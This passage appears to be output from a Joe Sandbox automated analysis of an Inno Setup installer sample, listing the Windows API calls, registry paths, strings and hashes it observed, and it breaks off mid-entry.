                                                                                        • GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 00484077
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc$HandleModuleVersion$CurrentErrorInfoLibraryLoadModeNativeProcessSystem
                                                                                        • String ID: SHGetKnownFolderPath$shell32.dll
                                                                                        • API String ID: 3869789854-2936008475
                                                                                        • Opcode ID: 24bfbd8baf235fcbd7404033d7799f009542697b8823181e059981251f96c700
                                                                                        • Instruction ID: 8066e8dcbdf9c94243579ba2519058cd674f052446347c20ec70bbddfecd8a90
                                                                                        • Opcode Fuzzy Hash: 24bfbd8baf235fcbd7404033d7799f009542697b8823181e059981251f96c700
                                                                                        • Instruction Fuzzy Hash: 1021F1B06103116AC700BFBE599611B3BA5EB9570C380893FF904DB391D77E68149B6E
                                                                                        APIs
                                                                                        • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,0047C92C,00000000,0047C942), ref: 0047C63A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: Close
                                                                                        • String ID: RegisteredOrganization$RegisteredOwner
                                                                                        • API String ID: 3535843008-1113070880
                                                                                        • Opcode ID: fe32ea5757c181cea0fad4739291adb7fe5cb56e5df920aee23c3361bee12acf
                                                                                        • Instruction ID: 97ba07fcc0924f8d698b93a4c32f8f7a3ceb81663af41ec066a5e596666b9838
                                                                                        • Opcode Fuzzy Hash: fe32ea5757c181cea0fad4739291adb7fe5cb56e5df920aee23c3361bee12acf
                                                                                        • Instruction Fuzzy Hash: F5F09060700204ABEB00D6A8ACD2BAA3769D750304F60907FA1058F382C679EE019B5C
                                                                                        APIs
                                                                                        • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,00475483), ref: 00475271
                                                                                        • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,00475483), ref: 00475288
                                                                                          • Part of subcall function 0045349C: GetLastError.KERNEL32(00000000,00454031,00000005,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004983A5,00000000), ref: 0045349F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseCreateErrorFileHandleLast
                                                                                        • String ID: CreateFile
                                                                                        • API String ID: 2528220319-823142352
                                                                                        • Opcode ID: 2c7b4fae504844472e6a07c4f0bcfda842c0d735d71c8af9ff6e211e096a353b
                                                                                        • Instruction ID: b0794b45f16520e4762b2717541816a935241bfc2e667b83be7f23d95be3de9d
                                                                                        • Opcode Fuzzy Hash: 2c7b4fae504844472e6a07c4f0bcfda842c0d735d71c8af9ff6e211e096a353b
                                                                                        • Instruction Fuzzy Hash: 99E06D702403447FEA10FA69CCC6F4A77989B04728F10C152BA48AF3E3C5B9FC808A58
                                                                                        APIs
                                                                                        • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: Open
                                                                                        • String ID: System\CurrentControlSet\Control\Windows$;H
                                                                                        • API String ID: 71445658-2565060666
                                                                                        • Opcode ID: a11f376e1d034aeb0d9ae53f60934921bcd728bb93d306f1768079d63b1ffdfe
                                                                                        • Instruction ID: 60e43675bb36a9eef4a15598a1848ca3f705ecc445ee8c9fe52fc6b05f1352bb
                                                                                        • Opcode Fuzzy Hash: a11f376e1d034aeb0d9ae53f60934921bcd728bb93d306f1768079d63b1ffdfe
                                                                                        • Instruction Fuzzy Hash: 29D09E72950128BB9B009A89DC41DFB775DDB15760F45441BF9049B141C5B4AC5197E4
                                                                                        APIs
                                                                                          • Part of subcall function 00457044: CoInitialize.OLE32(00000000), ref: 0045704A
                                                                                          • Part of subcall function 0042E394: SetErrorMode.KERNEL32(00008000), ref: 0042E39E
                                                                                          • Part of subcall function 0042E394: LoadLibraryA.KERNEL32(00000000,00000000,0042E3E8,?,00000000,0042E406,?,00008000), ref: 0042E3CD
                                                                                        • GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 004570D8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressErrorInitializeLibraryLoadModeProc
                                                                                        • String ID: SHCreateItemFromParsingName$shell32.dll
                                                                                        • API String ID: 2906209438-2320870614
                                                                                        • Opcode ID: 9d30f7af3022304e39d9007edb753d7b8512de14ad0f58a0e87bb64db50414c6
                                                                                        • Instruction ID: 7fba65882f7194314ab185764ebfac318737a269d5660949bdaf7135ffc1064c
                                                                                        • Opcode Fuzzy Hash: 9d30f7af3022304e39d9007edb753d7b8512de14ad0f58a0e87bb64db50414c6
                                                                                        • Instruction Fuzzy Hash: ECC08CA074860093CB40B3FA344320E1841AB8071FB10C07F7A04A66C7DE3C88088B2E
                                                                                        APIs
                                                                                          • Part of subcall function 0042E394: SetErrorMode.KERNEL32(00008000), ref: 0042E39E
                                                                                          • Part of subcall function 0042E394: LoadLibraryA.KERNEL32(00000000,00000000,0042E3E8,?,00000000,0042E406,?,00008000), ref: 0042E3CD
                                                                                        • GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 0046CE05
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressErrorLibraryLoadModeProc
                                                                                        • String ID: SHPathPrepareForWriteA$shell32.dll
                                                                                        • API String ID: 2492108670-2683653824
                                                                                        • Opcode ID: 4f35c33f472421c4948a2ce6cac4f72f28d005e98571f32e7a9733a845a9f857
                                                                                        • Instruction ID: c0603f0a452a360a01ce82207306765f02b8a986224f2e77b24b084cc810d505
                                                                                        • Opcode Fuzzy Hash: 4f35c33f472421c4948a2ce6cac4f72f28d005e98571f32e7a9733a845a9f857
                                                                                        • Instruction Fuzzy Hash: 44B092A060074086DB40B7A298D262B28269740319B20843BB0CC9BA95EB3E88240B9F
                                                                                        APIs
                                                                                        • LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,00000000,00448709), ref: 0044864C
                                                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 004486CD
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressLibraryLoadProc
                                                                                        • String ID:
                                                                                        • API String ID: 2574300362-0
                                                                                        • Opcode ID: 36521cdfc13aba0ae9c44214f12a2e14552a0dd36018004eb1372d311063bccb
                                                                                        • Instruction ID: 2eaa58f6359003fef9dee836e3db1fa56ae38c906bc4f4c4d93ca6671f7cd4fb
                                                                                        • Opcode Fuzzy Hash: 36521cdfc13aba0ae9c44214f12a2e14552a0dd36018004eb1372d311063bccb
                                                                                        • Instruction Fuzzy Hash: 14515470E00105AFDB40EF95C491AAEBBF9EB45319F11817FE414BB391DA389E05CB99
                                                                                        APIs
                                                                                        • GetSystemMenu.USER32(00000000,00000000,00000000,00481DB4), ref: 00481D4C
                                                                                        • AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 00481D5D
                                                                                        • AppendMenuA.USER32(00000000,00000000,0000270F,00000000), ref: 00481D75
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: Menu$Append$System
                                                                                        • String ID:
                                                                                        • API String ID: 1489644407-0
                                                                                        • Opcode ID: 672145a2bbc7660003845448dd8fd579fca208d3c81716cd1fbd69936c4767aa
                                                                                        • Instruction ID: 44f8b16540ed1c6eecf525242fd074403e334eda66194076213ef08da8c10300
                                                                                        • Opcode Fuzzy Hash: 672145a2bbc7660003845448dd8fd579fca208d3c81716cd1fbd69936c4767aa
                                                                                        • Instruction Fuzzy Hash: 3431D4307043441AD721FB769C82BAE3A989F15318F54483FF901AB2E3CA7CAD09879D
                                                                                        APIs
                                                                                        • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00424412
                                                                                        • TranslateMessage.USER32(?), ref: 0042448F
                                                                                        • DispatchMessageA.USER32(?), ref: 00424499
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: Message$DispatchPeekTranslate
                                                                                        • String ID:
                                                                                        • API String ID: 4217535847-0
                                                                                        • Opcode ID: d4f7142ddfb2041a0388c754ad29f8297397d1c5d5a6fc901d04af05902ad934
                                                                                        • Instruction ID: 8eae6dca0d2455523dd27ca57e4683f6da326f6f2f90499d04ddbfd693f83f9d
                                                                                        • Opcode Fuzzy Hash: d4f7142ddfb2041a0388c754ad29f8297397d1c5d5a6fc901d04af05902ad934
                                                                                        • Instruction Fuzzy Hash: E3116D303043205AEB20FA24A941B9F73D4DFC5758F80481EFC99972C2D77D9D49879A
                                                                                        APIs
                                                                                        • SetPropA.USER32(00000000,00000000), ref: 0041666A
                                                                                        • SetPropA.USER32(00000000,00000000), ref: 0041667F
                                                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,00000000,00000000,?,00000000,00000000), ref: 004166A6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: Prop$Window
                                                                                        • String ID:
                                                                                        • API String ID: 3363284559-0
                                                                                        • Opcode ID: 953367bc10487f5f00132df45b9f4bdc07709d3a3f88142737615a1cc8063318
                                                                                        • Instruction ID: 6913c5f2d07602d921388148e43cadd8ab2d6729f30613f48e4cae6714e3bc13
                                                                                        • Opcode Fuzzy Hash: 953367bc10487f5f00132df45b9f4bdc07709d3a3f88142737615a1cc8063318
                                                                                        • Instruction Fuzzy Hash: ACF01271701210ABDB10AB599C85FA732DCAB09714F16057AB905EF286C778DC40C7A8
                                                                                        APIs
                                                                                        • LocalAlloc.KERNEL32(00000000,00000644,?,|0e,004013A3,?,?,00401443,?,?,?,?,?,00401983), ref: 00401353
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocLocal
                                                                                        • String ID: X*e$|0e
                                                                                        • API String ID: 3494564517-3935743162
                                                                                        • Opcode ID: 833cffc3d4ae6fddf196a7017a3fa962a39b4640526386715143ff6d9bbaf8a6
                                                                                        • Instruction ID: 71c91fbc4c3ed8fd369fb1531a6952d3d9178ec9d6227f0a2e7a8dd8dab45303
                                                                                        • Opcode Fuzzy Hash: 833cffc3d4ae6fddf196a7017a3fa962a39b4640526386715143ff6d9bbaf8a6
                                                                                        • Instruction Fuzzy Hash: 0CF05E717013018FE724CF29D980656B7E1EBA9365F24807EE5C5D7761D3358C419B94
                                                                                        APIs
                                                                                        • IsWindowVisible.USER32(?), ref: 0041EE64
                                                                                        • IsWindowEnabled.USER32(?), ref: 0041EE6E
                                                                                        • EnableWindow.USER32(?,00000000), ref: 0041EE94
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$EnableEnabledVisible
                                                                                        • String ID:
                                                                                        • API String ID: 3234591441-0
                                                                                        • Opcode ID: 495d6a49dc4b54b7e424eeae3cce025a94256eba33976185de8149e812397146
                                                                                        • Instruction ID: 3b4cb379701a2ac24b7d0c87bf9454d2e26b3d0fb89a85d5a5a22e513a73856b
                                                                                        • Opcode Fuzzy Hash: 495d6a49dc4b54b7e424eeae3cce025a94256eba33976185de8149e812397146
                                                                                        • Instruction Fuzzy Hash: EAE06DB5100301AAE301AB2BDC81B5B7A9CAB54350F05843BA9089B292D63ADC408B7C
                                                                                        APIs
                                                                                        • SetActiveWindow.USER32(?), ref: 0046A02D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: ActiveWindow
                                                                                        • String ID: PrepareToInstall
                                                                                        • API String ID: 2558294473-1101760603
                                                                                        • Opcode ID: bd917288eaa5b05b1195b505efe9116c2b5c78d32a5283306b423edfa0bdd6d5
                                                                                        • Instruction ID: c614f106b7f0b4f176116dff63491c2ec041d81708a05a15fd0d1780f22877a3
                                                                                        • Opcode Fuzzy Hash: bd917288eaa5b05b1195b505efe9116c2b5c78d32a5283306b423edfa0bdd6d5
                                                                                        • Instruction Fuzzy Hash: 97A14934A00109DFCB00EF99D986EDEB7F5AF48304F5540B6E404AB362D738AE45CB9A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: /:*?"<>|
                                                                                        • API String ID: 0-4078764451
                                                                                        • Opcode ID: e5c60157bcf2278da473a52dbfa3e40327efacf8e8b2ac4b78b74c9d89147c88
                                                                                        • Instruction ID: 6c3526c54916fe71946563460b5bd12015a165326d65a32731909bc5939f884d
                                                                                        • Opcode Fuzzy Hash: e5c60157bcf2278da473a52dbfa3e40327efacf8e8b2ac4b78b74c9d89147c88
                                                                                        • Instruction Fuzzy Hash: CF71C370A40215BADB10E766DCD2FEE7BA19F05308F148067F580BB292E779AD458B4E
                                                                                        APIs
                                                                                        • SetActiveWindow.USER32(?), ref: 00482676
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: ActiveWindow
                                                                                        • String ID: InitializeWizard
                                                                                        • API String ID: 2558294473-2356795471
                                                                                        • Opcode ID: 3626624f3147e861467950174f06d96ecabfee41a1c9b8d7b2440425271d24be
                                                                                        • Instruction ID: 0fabbc08dbff6a0894d12042e1c617afa12541eacf44f0b659f2bb150b55c2ae
                                                                                        • Opcode Fuzzy Hash: 3626624f3147e861467950174f06d96ecabfee41a1c9b8d7b2440425271d24be
                                                                                        • Instruction Fuzzy Hash: 8311C130204200AFD700EB69EED6B1A37E4E764328F60057BE404D72A1EA796C41CB5E
                                                                                        APIs
                                                                                          • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                        • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,?,?,0047C740,00000000,0047C942), ref: 0047C539
                                                                                        Strings
                                                                                        • Software\Microsoft\Windows\CurrentVersion, xrefs: 0047C509
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseOpen
                                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion
                                                                                        • API String ID: 47109696-1019749484
                                                                                        • Opcode ID: 058bbab7ea9ec86a0dd33160b35f36364f977485e0abef3b7f9f2bc760079b92
                                                                                        • Instruction ID: acdf9366f140fa0c09696ff4b806567a5b27613a006b44f2785fa8682630d216
                                                                                        • Opcode Fuzzy Hash: 058bbab7ea9ec86a0dd33160b35f36364f977485e0abef3b7f9f2bc760079b92
                                                                                        • Instruction Fuzzy Hash: 6CF0823170052477DA00A65E6C82B9FA79D8B84758F60403FF508DB242EABAEE0243EC
                                                                                        APIs
                                                                                        • RegSetValueExA.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,0047620E,?,0049C1E0,?,0046F15B,?,00000000,0046F6F6,?,_is1), ref: 0046EE67
                                                                                        Strings
                                                                                        • Inno Setup: Setup Version, xrefs: 0046EE65
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: Value
                                                                                        • String ID: Inno Setup: Setup Version
                                                                                        • API String ID: 3702945584-4166306022
                                                                                        • Opcode ID: 80676ca53bf8d59feef104d4bc7cb567c816a54b460bafb4a4ed583678a3f251
                                                                                        • Instruction ID: 37dbbd71146fd60ed96ba35b84ff74d599aeccd68d0f9eb37ee109455dfe34ad
                                                                                        • Opcode Fuzzy Hash: 80676ca53bf8d59feef104d4bc7cb567c816a54b460bafb4a4ed583678a3f251
